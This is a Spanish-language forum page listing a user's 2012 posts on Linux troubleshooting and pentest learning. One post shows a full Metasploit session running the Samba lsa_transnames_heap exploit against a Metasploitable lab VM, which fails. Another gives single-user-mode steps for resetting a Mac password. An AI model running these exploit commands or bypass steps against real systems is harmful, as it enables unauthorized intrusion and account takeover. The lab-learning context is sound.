Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - CATBro

#31
GNU/Linux / Problemas con floppy en debian 6
28 Junio 2012, 06:10 AM
Que tal comunidad no puedo montar un diskette  lo meto a la unidad floppy, me meto al navegador de archivos y me sale el icono de Disquete le doy doble clic y me sale:
No se pudo montar el lugar
No hay un soporte de la unidad

entonces me fui a la consola y hice lo siguiente todo como root
mkdir /home/usuario/Prueba
mount /dev/fd0 //home/usuario/Prueba

Resultado: Tengo que especificar el sistema de archivos

luego hice:

mkdir /floppy
mount -t vfat /dev/fd0 /floopy/

Resultado: Supuestamente se monto pero cuando entro al directorio no encuentro nada!

En cualquier intento trato de desmontar la unidad y me sale que no se ha desmontado

El diskette tiene unas fotos de un accidente en carro que tuvo mi papa y las quiere recuperar alguien sabe que puedo hacer??
Saludos
#32
Que tal ando aprendiendo a usar nessu,metasploits y varias cosas mas en fin, corri el nessus contra la maquina virtual que difunde rapid7 creo( metasploitable ) un resultado de nessus me dice lo siguiente:
CVE 2007-2446
La version de servidor samba de la maquina objetivo es vulnerable a un ataque de desbordamiento de buffer, y en el reporte me dice cual exploit usar con metasploits , entonces
tecleo:

#msfconsole
msf  use exploit/linux/samba/lsa_transnames_heap
msf  exploit(lsa_transnames_heap) > set RHOST X.X:X:.X
msf  exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/exec
msf  exploit(lsa_transnames_heap) > set CMD ifconfig
msf  exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST     192.168.1.107    yes       The target address
   RPORT      445                     yes       Set the SMB service port
   SMBPIPE   LSARPC              yes       The pipe name to use


Payload options (linux/x86/exec):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   ifconfig         yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   0   Linux vsyscall

msf  exploit(lsa_transnames_heap) > exploit

  • Creating nop sled....
  • Trying to exploit Samba with address 0xffffe410...
  • Connecting to the SMB service...
    [-] Exploit exception: This target is not a vulnerable Samba server (Samba 3.0.20-Debian)

    ?????Que hago mal??o es un positivo falso lo que me da nessus, porque hace mucho cuando andaba en mi epoca de aprender lo mas rapido posible corria el armitage desde BT y funcionaba solo!!! Jeje pero ahorita me muevo con debia alguna idea

    Saludos!

#33
Hacking / Re: DUda sobre pentesing
25 Junio 2012, 16:59 PM
No sabia que hubiera tantas formas de pentesting yo lo tomaba como el pentest como un todo, (no se si me doy a entender) si no que deberias saber de todo,base de datos, sistemas operativos, programacion,redes etc...

Lo que no me gusta las metodologias es que estan en ingles y me canso mas rapido leyendo en ingles que en español.

No olvidemos OSSTMM que muchos documentos la mencionan.
Saludos

#34
Hacking / Re: Metagoofil no funciona!
25 Junio 2012, 16:46 PM
Ya intente con varios dominios, cuando recien me baje el backtrack me funcionaba muy bien , pero de esto es cuando estaba el bt 5 r1 cuando recien salio, ahora que ando con debian no funciona me instale el siguiente paquete.

apt-get install extract

Es el correcto??
En el codigo se indica la ruta correcta donde se encuentra el binario

extcommand='/usr/bin/extract'

Ni con el ejemplo que viene de microsoft funciona .
El problema es que no encuentra nada, jaajaj entonces si no encuentra nada pues de nada sirve el extract o me equivoco?
Es el mismo resultado si ejecuto el script conectado a mi isr inalambrico o por cable, suponiendo que es algun problema de compatibilidad pero desconozco mucho del tema de sockets.

El foca es lo mismo no?? de hecho por lo que eh leeido es mejor que el metagoofil que opinas??

Saludos
#35
Hacking / Metagoofil no funciona!
25 Junio 2012, 05:52 AM
Gente en mis aventuras con debian me descargue el metagoofil 1.4b y lo corro desde debian 6,

./metagoofil.py -d domain.com -l XXX -f all - o ejemplo - t temporal

Completa la busqueda y no muestra ningun resultado me muestra todo a cero, que no encontro nada.

Alguien sabe porque es esto??

Saludos
#36
Gente por lo que veo en el tp-link las funciones que trae, no es lo mismo el fortiwifi? nos venden el fortiwifi-40c porque queremos establecer un firewall para la red de la empresa pero por lo que entiendo sirve de igual forma el tp-link que tenemos al fortiwifi que quieren comprar, yo soy de la idea de instalar el pfsense pero si les comento que no tenemos ni idea de como funciona el pfsense y el fortiwifi XD

Ustedes que opinan?

#37
Por si a alguien le sirve eh aqui los pasos, que ya pude resolverlo.

Paso1: En el arranque del equipo manten presionado cmd + s, hasta entrar en modo monousario,( la pantalla se pone negra, entraste como root al sistema).
Paso 2: Tecleas mount -vf / (no recuerdo si es uf o vf)
Paso 3: Tecleas ls /Users
paso 4: Tecleas passwd NombreDeUsuario
paso5: Tecleas la contraseña
paso 6: Reinicias

Saludos Pueblo!!!!!

PD: No se formatea el Sistema
#38
En el trabajo me pidieron hacer copias de respaldo de los equipos mac de la empresa, un usuario no sabe que contraseña tiene la maquina para poder hacer el respaldo, ya realize varios pasos que encontre googleando y nada ninguno resulto, y pense si entrando como monousuario y modificando el archivo passwd borrando el segundo campo que es el de la contraseña creen que pueda entrar al sistema como root y establecer una nueva?? dentro del monousuario uno de los pasos que recuerdo que hice fue
#passwd root
new password: ***
retype: ****
Unable .......no recuerdo que decia

El metodo que les pregunto lo eh calado con el sistema operativo de CentOS y me ha funcionado pero no se si siendo una Mac le quite el acceso al sistema, ese es mi temor!

PD:No tienen los cd del equipo T_T

Saludos
#39
GNU/Linux / Servicio de VNC
14 Junio 2012, 18:18 PM
Instalando en una maquina el vnc4server en Debian6 cuando hacia la conexión con el vncviewer(asi se escribe??? XD )desde otra maquina me salia un mensaje que me hacia referencia a la seguridad del equipo que daba el servicio y no me dejaba iniciar sesion en el, supese que era el firewall (el supongo iptables) del servidor pero no tenia ni una regla o filtro establecido, y moviendo a la insterfaz grafica desde el entorno de Gnome en el menu:

Sistema/Preferencias/Escritorio Remoto

Ya solo marque la opcion de permitir a otros usuarios ver mi escritorio y funciono!!!

Pregunta: Como se haria esto desde la terminal suponiendo que no tengo entorno grafico???


Saludos !!!!
#40
Jjajaj al parecer ya tambien puedo instalar, por lo que entiendo todo se debio a programas mal instlados, pero no entiendo como me dan problemas al intentar instalar otro???Y por la parte de los comando lo que entiendo por lo que dicen su descripcion uno revisa que paquetes no se usan y los muestra y el otro los elimina con todo y sus ficheros de configuracion, o entendi mal??